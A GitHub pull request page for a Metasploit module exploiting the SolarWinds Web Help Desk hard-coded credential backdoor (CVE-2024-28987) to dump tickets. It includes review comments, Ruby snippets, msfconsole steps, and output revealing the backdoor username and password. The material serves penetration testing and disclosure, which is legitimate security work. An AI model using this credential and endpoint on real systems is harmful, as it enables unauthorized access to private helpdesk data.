-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SolarWinds Web Help Desk Backdoor (CVE-2024-28987) Module #19499
base: master
Are you sure you want to change the base?
Conversation
Initial draft
Documentation
minor improvements
added check method
I've added a
|
def auth | ||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Does this endpoint support pagination?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I'm not sure if this specific endpoint supports pagination, but I saw some other endpoints that might support it. I'll have to play around some more to see if there's another endpoint that could be used instead.
|
||
body = @auth.body | ||
fail_with(Failure::UnexpectedReply, 'Unexpected Reply: ' + @auth.to_s) unless body.include?('shortSubject') | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It'd be great to persist this in the database as a vulnerability, example:
vprint_good("Detected DLSw protocol") | |
report_service( | |
host: rhost, | |
port: rport, | |
proto: 'tcp', | |
name: 'dlsw' | |
) | |
# TODO: check that response has something that truly indicates it is vulnerable | |
# and not simply that it responded | |
unless response[18..72].scan(/\x00/).length == 54 | |
print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes") | |
report_vuln( | |
host: rhost, | |
port: rport, | |
name: name, | |
refs: references, | |
info: "Module #{fullname} collected #{response.length} bytes" | |
) | |
Exploit::CheckCode::Vulnerable | |
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I guess technically we should store the credential too?
metasploit-framework/modules/auxiliary/gather/advantech_webaccess_creds.rb
Lines 126 to 151 in 7b47050
def report_cred(opts) | |
service_data = { | |
address: rhost, | |
port: rport, | |
service_name: 'webaccess', | |
protocol: 'tcp', | |
workspace_id: myworkspace_id | |
} | |
credential_data = { | |
origin_type: :service, | |
module_fullname: fullname, | |
username: opts[:user], | |
private_data: opts[:password], | |
private_type: :password | |
}.merge(service_data) | |
login_data = { | |
last_attempted_at: DateTime.now, | |
core: create_credential(credential_data), | |
status: opts[:status], | |
proof: opts[:proof] | |
}.merge(service_data) | |
create_credential_login(login_data) | |
end |
I'll just run this by the team tomorrow to confirm if it's the convention to register hard-coded app creds into Metasploit's database or not 👍
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you for the feedback, I've added report_service
and report_vuln
:
msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.217.145 8443 tcp solarwinds web help desk open
msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > vulns -i
Vulnerabilities
===============
Timestamp Host Name References Information
--------- ---- ---- ---------- -----------
2024-09-26 03:56:23 UTC 192.168.217.145 SolarWinds Web Help Desk Backdoor (CVE-2024-2898 CVE-2024-28987,URL-https://www.solarwinds.com/tr The backdoor helpdeskIntegrationUser:dev-C4F8025
7) ust-center/security-advisories/cve-2024-28987,UR E7 works.
L-https://support.solarwinds.com/SuccessCenter/s
/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-
2,URL-https://www.horizon3.ai/attack-research/cv
e-2024-28987-solarwinds-web-help-desk-hardcoded-
credential-vulnerability-deep-dive/
added report_vuln, report_service, limited console output
Use TICKETSTODUMP instead of n characters
Updated documentation
Note: This is still a draft.
This is a new module which exploits a backdoor in SolarWinds Web Help Desk (CVE-2024-28987) <= v12.8.3 to retrieve all tickets from the system.
Verification Steps
msfconsole
use auxiliary/gather/solarwinds_webhelpdesk_backdoor
set RHOSTS <IP>
run
Successfully tested on
Notes
I still need to add error handling, etc., but I wanted to get the initial draft published already.